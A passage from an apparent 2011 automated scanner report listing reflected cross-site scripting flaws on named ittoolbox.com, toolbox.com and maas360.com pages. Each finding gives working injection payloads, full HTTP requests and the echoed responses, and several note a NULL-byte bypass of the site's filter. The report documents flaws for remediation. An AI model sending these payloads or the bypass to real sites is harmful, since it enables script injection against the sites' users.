
GET /?1a39f'-alert(1)-'bbb340ffdfa=1 HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78783
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wqd5uw45dqu3kh553yd53xb3; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Hardware Co
...[SNIP]...
!= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fhardware.ittoolbox.com%2fDefault.aspx%3f1a39f'-alert(1)-'bbb340ffdfa%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.27. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hardware.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 905e6"style%3d"x%3aexpression(alert(1))"f8c60833ac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 905e6"style="x:expression(alert(1))"f8c60833ac1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?905e6"style%3d"x%3aexpression(alert(1))"f8c60833ac1=1 HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=l015iq5554rrn1qehqeunl45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Hardware Co
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://hardware.ittoolbox.com/Default.aspx?905e6"style="x:expression(alert(1))"f8c60833ac1=1" />
...[SNIP]...

3.28. http://hs.maas360.com/white-paper/ [A parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the A request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35549"><script>alert(1)</script>dc2e0902316 was submitted in the A parameter. This input was echoed as 35549\"><script>alert(1)</script>dc2e0902316 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /white-paper/?id=95&A=marchex35549"><script>alert(1)</script>dc2e0902316&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:41 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95&A=marchex35549\"><script>alert(1)</script>dc2e0902316&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox"/>
...[SNIP]...

3.29. http://hs.maas360.com/white-paper/ [O parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50090"><script>alert(1)</script>c217ab0b9fa was submitted in the O parameter. This input was echoed as 50090\"><script>alert(1)</script>c217ab0b9fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /white-paper/?id=95&A=marchex&O=HS50090"><script>alert(1)</script>c217ab0b9fa&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:47 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95&A=marchex&O=HS50090\"><script>alert(1)</script>c217ab0b9fa&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox"/>
...[SNIP]...

3.30. http://hs.maas360.com/white-paper/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf14"><script>alert(1)</script>4e101bed925 was submitted in the REST URL parameter 1. This input was echoed as 4bf14\"><script>alert(1)</script>4e101bed925 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /white-paper4bf14"><script>alert(1)</script>4e101bed925/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:43 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper4bf14\"><script>alert(1)</script>4e101bed925/"/>
...[SNIP]...

3.31. http://hs.maas360.com/white-paper/ [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe51e"><script>alert(1)</script>eb667fd33ac was submitted in the id parameter. This input was echoed as fe51e\"><script>alert(1)</script>eb667fd33ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /white-paper/?id=95fe51e"><script>alert(1)</script>eb667fd33ac&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:40 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95fe51e\"><script>alert(1)</script>eb667fd33ac&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox"/>
...[SNIP]...

3.32. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360ea"><script>alert(1)</script>364e31c891a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 360ea\"><script>alert(1)</script>364e31c891a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?360ea"><script>alert(1)</script>364e31c891a=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:36 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?360ea\"><script>alert(1)</script>364e31c891a=1"/>
...[SNIP]...

3.33. http://hs.maas360.com/white-paper/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ecef"><script>alert(1)</script>c72cf329bb7 was submitted in the utm_campaign parameter. This input was echoed as 1ecef\"><script>alert(1)</script>c72cf329bb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial1ecef"><script>alert(1)</script>c72cf329bb7&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:56:01 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:56:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial1ecef\"><script>alert(1)</script>c72cf329bb7&utm_term=Toolbox"/>
...[SNIP]...

3.34. http://hs.maas360.com/white-paper/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb94"><script>alert(1)</script>1de023c3ac0 was submitted in the utm_medium parameter. This input was echoed as 1fb94\"><script>alert(1)</script>1de023c3ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc1fb94"><script>alert(1)</script>1de023c3ac0&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:56 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc1fb94\"><script>alert(1)</script>1de023c3ac0&utm_campaign=Financial&utm_term=Toolbox"/>
...[SNIP]...

3.35. http://hs.maas360.com/white-paper/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7e8"><script>alert(1)</script>d8aa60128b1 was submitted in the utm_source parameter. This input was echoed as 3b7e8\"><script>alert(1)</script>d8aa60128b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex3b7e8"><script>alert(1)</script>d8aa60128b1&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:54 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95&A=marchex&O=HS&utm_source=marchex3b7e8\"><script>alert(1)</script>d8aa60128b1&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox"/>
...[SNIP]...

3.36. http://hs.maas360.com/white-paper/ [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db93f"><script>alert(1)</script>9bc17df5d49 was submitted in the utm_term parameter. This input was echoed as db93f\"><script>alert(1)</script>9bc17df5d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolboxdb93f"><script>alert(1)</script>9bc17df5d49 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:56:03 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:56:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolboxdb93f\"><script>alert(1)</script>9bc17df5d49"/>
...[SNIP]...

3.37. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://infor.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6ec6"style%3d"x%3aexpression(alert(1))"0e278d69efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6ec6"style="x:expression(alert(1))"0e278d69efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?d6ec6"style%3d"x%3aexpression(alert(1))"0e278d69efd=1 HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54401
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qoula355jchnl0am2e3e2i55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Infor Commu
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://infor.ittoolbox.com/Default.aspx?d6ec6"style="x:expression(alert(1))"0e278d69efd=1" />
...[SNIP]...

3.38. http://infor.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://infor.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14fe2'-alert(1)-'cfeea45fd7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?14fe2'-alert(1)-'cfeea45fd7b=1 HTTP/1.1
Host: infor.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54286
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ww5znmesfgdrusjq50mcwm45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Infor Commu
...[SNIP]...
der != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2finfor.ittoolbox.com%2fDefault.aspx%3f14fe2'-alert(1)-'cfeea45fd7b%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.39. http://it.toolbox.com/blogs/ppmtoday [306f2'-alert(1)-'2382eb5920b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The value of the 306f2'-alert(1)-'2382eb5920b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e98d'-alert(1)-'3c5ebd829e6 was submitted in the 306f2'-alert(1)-'2382eb5920b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=13e98d'-alert(1)-'3c5ebd829e6 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d13e98d'-alert(1)-'3c5ebd829e6';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.40. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 608cc'-alert(1)-'435b0e52deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&608cc'-alert(1)-'435b0e52deb=1 HTTP/1.1
Host: it.toolbox.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26306f2'-alert(1)-'2382eb5920b%3d1%26608cc'-alert(1)-'435b0e52deb%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.41. http://it.toolbox.com/blogs/ppmtoday/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/

Issue detail

